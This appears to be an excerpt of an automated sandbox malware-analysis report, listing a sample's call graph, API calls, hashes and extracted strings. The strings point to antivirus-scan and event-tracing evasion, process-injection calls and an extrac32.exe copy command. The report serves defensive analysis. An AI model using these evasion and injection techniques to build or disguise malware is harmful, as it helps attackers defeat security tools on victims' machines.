28c141c 37252->37253 37257 28a49c4 11 API calls 37253->37257 37260 28a47b0 11 API calls 37254->37260 37259 28c144f 37257->37259 37262 28a4824 11 API calls 37259->37262 37264 28c1262 37260->37264 37265 28c1470 37262->37265 37267 28b7be8 17 API calls 37264->37267 37271 28a47b0 11 API calls 37265->37271 37269 28c1286 37267->37269 37272 28a4824 11 API calls 37269->37272 37275 28c14a7 37271->37275 37273 28c12a7 37272->37273 37276 28c12bf 37273->37276 37278 28b7be8 17 API calls 37275->37278 37281 28a47b0 11 API calls 37276->37281 37280 28c14cb 37278->37280 37283 28a4824 11 API calls 37280->37283 37284 28c12de 37281->37284 37287 28c14ec 37283->37287 37286 28c12f6 37284->37286 37290 28b7be8 17 API calls 37286->37290 37289 28c1504 37287->37289 37292 28a47b0 11 API calls 37289->37292 37293 28c1302 37290->37293 37296 28c1523 37292->37296 37294 28c1319 37293->37294 39054 28a8004 CreateDirectoryA 37294->39054 37299 28c153b 37296->37299 37301 28b7be8 17 API calls 37299->37301 37302 28c1547 37301->37302 37304 28a4824 11 API calls 37302->37304 37306 28c1568 37304->37306 37309 28c1573 37306->37309 37312 28a47b0 11 API calls 37309->37312 37314 28c159f 37312->37314 37315 28c15aa 37314->37315 37318 28b7be8 17 API calls 37315->37318 37319 28c15c3 37318->37319 37321 28a4824 11 API calls 37319->37321 37325 28c15e4 37321->37325 37327 28a47b0 11 API calls 37325->37327 37330 28c161b 37327->37330 37334 28b7be8 17 API calls 37330->37334 37335 28c163f 37334->37335 37338 28c1654 37335->37338 37339 28c3345 37335->37339 37340 28a4824 11 API calls 37338->37340 37342 28a4824 11 API calls 37339->37342 37347 28c1692 37340->37347 37344 28c3366 37342->37344 37349 28c3371 37344->37349 37348 28c16aa 37347->37348 37350 28a7e18 GetFileAttributesA 37348->37350 37352 28a47b0 11 API calls 37349->37352 37353 28c16b5 37350->37353 37354 28c339d 37352->37354 37353->37339 37355 28c16bd 37353->37355 37359 28c33a8 37354->37359 37357 28a4824 11 API calls 37355->37357 37363 28c16de 37357->37363 37360 28b7be8 17 API calls 37359->37360 37362 28c33c1 37360->37362 37365 28a4824 11 API calls 37362->37365 37367 28a47b0 11 API calls 37363->37367 37370 28c33e2 37365->37370 37371 28c1715 37367->37371 37373 28a47b0 11 API calls 37370->37373 37374 28b7be8 17 API calls 37371->37374 37380 28c3419 37373->37380 37375 28c1739 37374->37375 37377 28a4824 11 API calls 37375->37377 37386 28c175a 37377->37386 37382 28b7be8 17 API calls 37380->37382 37385 28c343d 37382->37385 37388 28a4824 11 API calls 37385->37388 37389 28c1772 37386->37389 37391 28c345e 37388->37391 37392 28a47b0 11 API calls 37389->37392 37395 28c3476 37391->37395 37396 28c1791 37392->37396 37399 28a47b0 11 API calls 37395->37399 37397 28c17a9 37396->37397 37400 28b7be8 17 API calls 37397->37400 37402 28c3495 37399->37402 37403 28c17b5 37400->37403 37408 28c34ad 37402->37408 37405 28a4824 11 API calls 37403->37405 37406 28c17d6 37405->37406 37409 28c17e1 37406->37409 37411 28b7be8 17 API calls 37408->37411 37418 28a47b0 11 API calls 37409->37418 37413 28c34b9 37411->37413 37414 28a4824 11 API calls 37413->37414 37417 28c34da 37414->37417 37424 28c34e5 37417->37424 37420 28c180d 37418->37420 37422 28c1818 37420->37422 37426 28b7be8 17 API calls 37422->37426 37425 28a47b0 11 API calls 37424->37425 37428 28c3511 37425->37428 37429 28c1831 37426->37429 37434 28c351c 37428->37434 37430 28c1841 37429->37430 37432 28a7e3c GetFileAttributesA 37430->37432 37435 28c184c 37432->37435 37436 28b7be8 17 API calls 37434->37436 37435->37339 37437 28c1854 37435->37437 37439 28c3535 37436->37439 37440 28a4824 11 API calls 37437->37440 37442 28a4824 11 API calls 37439->37442 37448 28c1875 37440->37448 37447 28c3556 37442->37447 37451 28a47b0 11 API calls 37447->37451 37452 28a47b0 11 API calls 37448->37452 37457 28c358d 37451->37457 37456 28c18ac 37452->37456 37458 28b7be8 17 API calls 37456->37458 37460 28b7be8 17 API calls 37457->37460 37461 28c18d0 37458->37461 37463 28c35b1 37460->37463 37464 28a4824 11 API calls 37461->37464 38601 28bc78c 37463->38601 37474 28c18f1 37464->37474 37470 28a44f4 11 API calls 37472 28c35d7 37470->37472 37473 28a4824 11 API calls 37472->37473 37477 28c35f8 37473->37477 37479 28a47b0 11 API calls 37474->37479 37483 28c3603 37477->37483 37484 28c1928 37479->37484 37485 28a47b0 11 API calls 37483->37485 37487 28b7be8 17 API calls 37484->37487 37486 28c362f 37485->37486 37489 28c363a 37486->37489 37494 28c194c 37487->37494 37492 28c3647 37489->37492 37496 28b7be8 17 API calls 37492->37496 39055 28a794c 11 API calls 37494->39055 37498 28c3653 37496->37498 37501 28a4824 11 API calls 37498->37501 37504 28c3674 37501->37504 37502 28c1981 37508 28a4824 11 API calls 37502->37508 37510 28c367f 37504->37510 37514 28c19d8 37508->37514 37512 28a47b0 11 API calls 37510->37512 37513 28c36ab 37512->37513 37515 28c36b6 37513->37515 37516 28a47b0 11 API calls 37514->37516 37518 28c36c3 37515->37518 37523 28c1a0f 37516->37523 37521 28b7be8 17 API calls 37518->37521 37522 28c36cf 37521->37522 37525 28a7a88 42 API calls 37522->37525 37528 28b7be8 17 API calls 37523->37528 37527 28c36d9 37525->37527 37530 28bd270 11 API calls 37527->37530 37531 28c1a33 37528->37531 37532 28c36eb 37530->37532 37534 28a4824 11 API calls 37531->37534 37539 28c1a79 37534->37539 38596 28b4d90 37539->38596 39073 28a4590 38545->39073 38549 28a49c9 38548->38549 38550 28a49f6 38548->38550 38549->38550 38552 28a49dd 38549->38552 38551 28a44a0 11 API calls 38550->38551 38554 28a49ec 38551->38554 38553 28a4590 11 API calls 38552->38553 38553->38554 38554->36325 38556 28a4daa 38555->38556 38558 28a7a98 38557->38558 38559 28a7ab9 38558->38559 39078 28a761c 42 API calls 38558->39078 38561 28bd270 38559->38561 38563 28bd28d 38561->38563 38562 28bd2eb 38565 28a44a0 11 API calls 38562->38565 38563->38562 39079 28a4688 11 API calls 38563->39079 39080 28a44f4 11 API calls 38563->39080 38566 28bd300 38565->38566 38568 28a44a0 11 API calls 38566->38568 38569 28bd308 38568->38569 38569->36893 38571 28a44f4 11 API calls 38570->38571 38573 28bd220 38571->38573 38572 28bd267 38572->36972 38573->38572 38574 28a49bc 11 API calls 38573->38574 38574->38573 38576 28bc659 38575->38576 38577 28a44f4 11 API calls 38576->38577 38578 28bc685 38577->38578 39081 28a5794 38578->39081 38580 28bc6c5 38581 28a44f4 11 API calls 38580->38581 38583 28bc6d7 38581->38583 38582 28a49c4 11 API calls 38584 28bc6a9 38582->38584 38586 28a44c4 11 API calls 38583->38586 38584->38580 38584->38582 38584->38583 39084 28a4a04 11 API calls 38584->39084 38587 28bc73c 38586->38587 38588 28a57dc 38587->38588 38590 28a57e3 38588->38590 38589 28a57fd 38589->37095 38590->38589 39108 28a57a0 13 API calls 38590->39108 38593 28a4964 38592->38593 38594 28a7e46 GetFileAttributesA 38593->38594 38595 28a7e51 38594->38595 38595->37208 38595->37209 39109 28b5ba4 38596->39109 38598 28b4daa 39113 28a7d9c WriteFile 38598->39113 38599 28b4dc5 38611 28bc7ae 38601->38611 38602 28bc850 38603 28a4b90 11 API calls 38602->38603 38604 28bc865 38603->38604 38606 28a44f4 11 API calls 38604->38606 38607 28bc870 38606->38607 38609 28a44a0 11 API calls 38607->38609 38610 28bc885 38609->38610 38612 28a44c4 11 API calls 38610->38612 38611->38602 39146 28a4688 11 API calls 38611->39146 39147 28a44f4 11 API calls 38611->39147 38613 28bc892 38612->38613 38613->37470 39032 28a4ee4 2 API calls 39031->39032 39033 28bc4f1 39032->39033 39034 28a44a0 11 API calls 39033->39034 39035 28bc506 39034->39035 39036 28bc516 RtlDosPathNameToNtPathName_U 39035->39036 39189 28bc340 39036->39189 39038 28bc532 NtOpenFile NtQueryInformationFile 39039 28a4b90 11 API calls 39038->39039 39040 28bc56d 39039->39040 39041 28a49bc 11 API calls 39040->39041 39042 28bc579 NtReadFile NtClose 39041->39042 39043 28bc5a3 39042->39043 39044 28a4c24 SysFreeString 39043->39044 39045 28bc5ab 39044->39045 39045->36469 39047 28bc5da 39046->39047 39190 28a8d50 39047->39190 39050 28a44a0 11 API calls 39051 28bc62d 39050->39051 39051->36589 39051->36590 39053 28a4d3e 39052->39053 39054->37209 39055->37502 39065 28a4c42 39064->39065 39066 28a4c48 SysFreeString 39065->39066 39067 28a4c5a 39065->39067 39066->39065 39067->36866 39068->36980 39069->36992 39070->37014 39071->37041 39072->37068 39074 28a4564 11 API calls 39073->39074 39075 28a45a0 39074->39075 39076 28a44a0 11 API calls 39075->39076 39077 28a45b8 39076->39077 39077->36320 39078->38559 39079->38563 39080->38563 39085 28a5608 39081->39085 39084->38584 39086 28a5627 39085->39086 39090 28a5641 39085->39090 39087 28a5632 39086->39087 39102 28a2cf4 11 API calls 39086->39102 39103 28a5600 13 API calls 39087->39103 39091 28a568a 39090->39091 39104 28a2cf4 11 API calls 39090->39104 39092 28a5697 39091->39092 39094 28a56cc 39091->39094 39105 28a2c44 11 API calls 39092->39105 39106 28a2c10 11 API calls 39094->39106 39097 28a56d6 39098 28a56c7 39097->39098 39107 28a55e8 16 API calls 39097->39107 39099 28a563c 39098->39099 39101 28a5608 16 API calls 39098->39101 39099->38584 39101->39098 39102->39087 39103->39099 39104->39091 39105->39098 39106->39097 39107->39098 39108->38589 39110 28b5bad 39109->39110 39115 28b5be8 39110->39115 39112 28b5bc9 39112->38598 39114 28a7db9 39113->39114 39114->38599 39116 28b5c03 39115->39116 39117 28b5c2a 39116->39117 39118 28b5ca8 39116->39118 39120 28b5c43 CreateFileA 39117->39120 39142 28a7d18 CreateFileA 39118->39142 39121 28b5c54 39120->39121 39122 28b5ca1 39121->39122 39139 28a7f54 12 API calls 39121->39139 39126 28a44f4 11 API calls 39122->39126 39123 28b5cb2 39123->39122 39143 28a7f54 12 API calls 39123->39143 39129 28b5d15 39126->39129 39127 28b5ccd GetLastError 39144 28aa734 12 API calls 39127->39144 39128 28b5c68 GetLastError 39140 28aa734 12 API calls 39128->39140 39132 28a44c4 11 API calls 39129->39132 39135 28b5d2f 39132->39135 39133 28b5ce4 39145 28ab040 42 API calls 39133->39145 39134 28b5c7f 39141 28ab040 42 API calls 39134->39141 39135->39112 39138 28b5d06 39138->39122 39139->39128 39140->39134 39141->39122 39142->39123 39143->39127 39144->39133 39145->39138 39146->38611 39147->38611 39189->39038 39191 28a8d5d 39190->39191 39192 28a8d83 39191->39192 39194 28a761c 42 API calls 39191->39194 39192->39050 39194->39192

                                                                                                                              Executed Functions

                                                                                                                              Function 028BD5D0 Relevance: 218.7, APIs: 9, Strings: 111, Instructions: 8669COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • InetIsOffline.URL(00000000,00000000,028C8FB6,?,?,?,00000000,00000000), ref: 028BD604
                                                                                                                                • Part of subcall function 028B7BE8: LoadLibraryW.KERNEL32(?,00000000,028B7C9A), ref: 028B7C18
                                                                                                                                • Part of subcall function 028B7BE8: GetModuleHandleW.KERNEL32(?,?,00000000,028B7C9A), ref: 028B7C1E
                                                                                                                                • Part of subcall function 028B7BE8: GetProcAddress.KERNEL32(00000000,00000000), ref: 028B7C37
                                                                                                                                • Part of subcall function 028A7E18: GetFileAttributesA.KERNEL32(00000000,?,028BE0EE,ScanString,02905344,028C8FEC,OpenSession,02905344,028C8FEC,ScanString,02905344,028C8FEC,UacScan,02905344,028C8FEC,UacInitialize), ref: 028A7E23
                                                                                                                                • Part of subcall function 028AC320: GetModuleFileNameA.KERNEL32(00000000,?,00000105,029055F0,?,028BE40F,ScanBuffer,02905344,028C8FEC,OpenSession,02905344,028C8FEC,ScanBuffer,02905344,028C8FEC,OpenSession), ref: 028AC337
                                                                                                                                • Part of subcall function 028BC4DC: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,028BC5AC), ref: 028BC517
                                                                                                                                • Part of subcall function 028BC4DC: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,028BC5AC), ref: 028BC547
                                                                                                                                • Part of subcall function 028BC4DC: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 028BC55C
                                                                                                                                • Part of subcall function 028BC4DC: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 028BC588
                                                                                                                                • Part of subcall function 028BC4DC: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 028BC591
                                                                                                                                • Part of subcall function 028A7E3C: GetFileAttributesA.KERNEL32(00000000,?,028C1133,ScanString,02905344,028C8FEC,OpenSession,02905344,028C8FEC,OpenSession,02905344,028C8FEC,ScanBuffer,02905344,028C8FEC,ScanString), ref: 028A7E47
                                                                                                                                • Part of subcall function 028A8004: CreateDirectoryA.KERNEL32(00000000,00000000,?,028C1324,ScanBuffer,02905344,028C8FEC,OpenSession,02905344,028C8FEC,Initialize,02905344,028C8FEC,ScanString,02905344,028C8FEC), ref: 028A8011
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: File$AttributesModuleNamePath$AddressCloseCreateDirectoryHandleInetInformationLibraryLoadName_OfflineOpenProcQueryRead
                                                                                                                              • String ID: .url$@^@$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Users\Public\Libraries$C:\Windows\SysWOW64$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows\\System32\\extrac32.exe /C /Y $CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$DEEX$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FindCertsByIssuer$FlushInstructionCache$GET$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$^^Nc$acS$bcrypt$can$endpointdlp$http$ieproxy$iexpress.exe$kernel32$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$tquery$wintrust
                                                                                                                              • API String ID: 2725267379-582383607
                                                                                                                              • Opcode ID: c6a41d30d326f4be08bd8637e673c166afc0f4b1fe317dbe9b721a295512ea00
                                                                                                                              • Instruction ID: 26b326ac3109ea13dcb211d165ce6e1071b6618c5d6e10899630a485b9b146de
                                                                                                                              • Opcode Fuzzy Hash: c6a41d30d326f4be08bd8637e673c166afc0f4b1fe317dbe9b721a295512ea00
                                                                                                                              • Instruction Fuzzy Hash: C4041C3DA542588FEF11EB68D890ADDB3B6AF85700F2484E5A009E7354DFB0AE85CF51
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 028C5FA0 Relevance: 142.4, APIs: 3, Strings: 77, Instructions: 2445COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 4522 28c5fa0-28c618a call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 4577 28c6190-28c638f call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a48b0 4522->4577 4578 28c618b call 28b7be8 4522->4578 4637 28c6b54-28c6cd7 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a48b0 4577->4637 4638 28c6395-28c69b4 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a2ee0 call 28a2f08 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 GetCurrentProcess call 28b7968 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 4577->4638 4578->4577 4727 28c6cdd-28c6cec call 28a48b0 4637->4727 4728 28c74a8-28c8b96 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 * 16 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 ExitProcess 4637->4728 5166 28c69bb-28c6b4f call 28a49bc call 28bc5bc call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 EnumSystemLocalesA 4638->5166 5167 28c69b6-28c69b9 4638->5167 4727->4728 4738 28c6cf2-28c6fc5 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28bd198 call 28a4824 call 28a4964 call 28a4698 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a7e18 4727->4738 4979 28c6fcb-28c729d call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28bc74c call 28a44f4 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4da4 * 2 call 28a4728 call 28bc3f8 4738->4979 4980 28c72a2-28c74a3 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a49bc call 28b7f48 4738->4980 4979->4980 4980->4728 5166->4637 5167->5166
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 028B7BE8: LoadLibraryW.KERNEL32(?,00000000,028B7C9A), ref: 028B7C18
                                                                                                                                • Part of subcall function 028B7BE8: GetModuleHandleW.KERNEL32(?,?,00000000,028B7C9A), ref: 028B7C1E
                                                                                                                                • Part of subcall function 028B7BE8: GetProcAddress.KERNEL32(00000000,00000000), ref: 028B7C37
                                                                                                                                • Part of subcall function 028A2EE0: QueryPerformanceCounter.KERNEL32 ref: 028A2EE4
                                                                                                                              • GetCurrentProcess.KERNEL32(00000000,00000000,00001000,00000040,ScanBuffer,02905344,028C8FEC,OpenSession,02905344,028C8FEC,UacScan,02905344,028C8FEC,ScanBuffer,02905344,028C8FEC), ref: 028C681D
                                                                                                                                • Part of subcall function 028B7968: GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 028B7975
                                                                                                                                • Part of subcall function 028B7968: GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 028B797B
                                                                                                                                • Part of subcall function 028B7968: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 028B799B
                                                                                                                              • EnumSystemLocalesA.C:\WINDOWS\SYSTEM32\KERNELBASE(00000000,00000000,ScanBuffer,02905344,028C8FEC,OpenSession,02905344,028C8FEC,UacScan,02905344,028C8FEC,ScanBuffer,02905344,028C8FEC,OpenSession,02905344), ref: 028C6B4F
                                                                                                                                • Part of subcall function 028A7E18: GetFileAttributesA.KERNEL32(00000000,?,028BE0EE,ScanString,02905344,028C8FEC,OpenSession,02905344,028C8FEC,ScanString,02905344,028C8FEC,UacScan,02905344,028C8FEC,UacInitialize), ref: 028A7E23
                                                                                                                                • Part of subcall function 028BC3F8: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,028BC4CA), ref: 028BC437
                                                                                                                                • Part of subcall function 028BC3F8: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 028BC471
                                                                                                                                • Part of subcall function 028BC3F8: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 028BC49E
                                                                                                                                • Part of subcall function 028BC3F8: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 028BC4A7
                                                                                                                              • ExitProcess.KERNEL32(00000000,ScanBuffer,02905344,028C8FEC,OpenSession,02905344,028C8FEC,Initialize,02905344,028C8FEC,ScanString,02905344,028C8FEC,OpenSession,02905344,028C8FEC), ref: 028C8B96
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
